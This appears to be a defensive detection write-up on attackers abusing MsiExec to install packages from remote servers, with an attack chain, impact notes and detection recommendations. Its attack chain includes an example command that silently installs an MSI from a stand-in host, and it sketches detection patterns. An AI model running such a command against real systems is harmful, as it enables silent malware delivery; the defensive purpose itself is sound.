Potential Remote Install via MsiExec
Adversaries may abuse Windows Installers via MsiExec to install files from remote servers for initial access and delivery of malware, which is detected by identifying MsiExec processes with network connections and specific command-line arguments.
Attackers may exploit the Windows utility MsiExec to execute malicious payloads disguised as legitimate installations. This involves using MsiExec to install files from a remote server, a technique employed for initial access and malware delivery. The Elastic detection rule, published on 2026-04-20, identifies suspicious child processes spawned by MsiExec that initiate network activity, which is atypical for standard installations. This activity is detected using EQL queries that examine process names, command-line arguments, and parent processes. The rule specifically looks for msiexec.exe processes with arguments indicating remote installation (e.g., -i*, /i*) and network access (*http*), while also excluding legitimate software update processes. This activity matters because it bypasses traditional security measures by abusing a trusted system utility.
Attack Chain
- An attacker gains initial access through a phishing email or compromised website.
- The user unknowingly executes a malicious file (e.g., via script interpreter or macro).
- The malicious file executes a command to run
msiexec.exe. msiexec.exeis invoked with command-line arguments to install a package from a remote server (e.g.,msiexec.exe /i http://example.com/malicious.msi /qn). The/qnflag ensures the installation runs silently.- MsiExec downloads the malicious MSI package from the remote server.
- The MSI package executes embedded malicious code, potentially gaining elevated privileges.
- The malicious code establishes a reverse shell or downloads further payloads.
- The attacker achieves command and control, enabling them to perform actions like data exfiltration or lateral movement.
Impact
Successful exploitation can lead to complete system compromise, allowing attackers to install malware, steal sensitive data, or disrupt business operations. The number of victims can range from single machines to entire networks, depending on the attacker's objectives. Sectors most commonly targeted include healthcare, finance, and government, due to the sensitive data they hold. If the attack succeeds, the organization may face significant financial losses, reputational damage, and legal consequences.
Recommendation
- Deploy the Sigma rule "MsiExec Remote Payload Installation" to your SIEM to detect suspicious MsiExec activity (see rule configuration below).
- Enable Sysmon process-creation logging to provide the necessary process metadata for the Sigma rule to function effectively.
- Review and tune the Sigma rule's exclusion list to prevent false positives from legitimate software installations.
- Monitor network connections initiated by
msiexec.exeprocesses to identify unauthorized network activity. - Implement application control policies to restrict the execution of
msiexec.exeto authorized users and processes only. - Investigate any alerts generated by the Sigma rule immediately to determine the scope and impact of the potential attack.
Detection coverage 2
MsiExec Remote Payload Installation
highDetects MsiExec processes attempting to install packages from remote URLs, indicating potential malware installation.
MsiExec Suspicious Parent Process
mediumDetects MsiExec being run from suspicious parent processes.
Detection queries are available on the platform. Get full rules →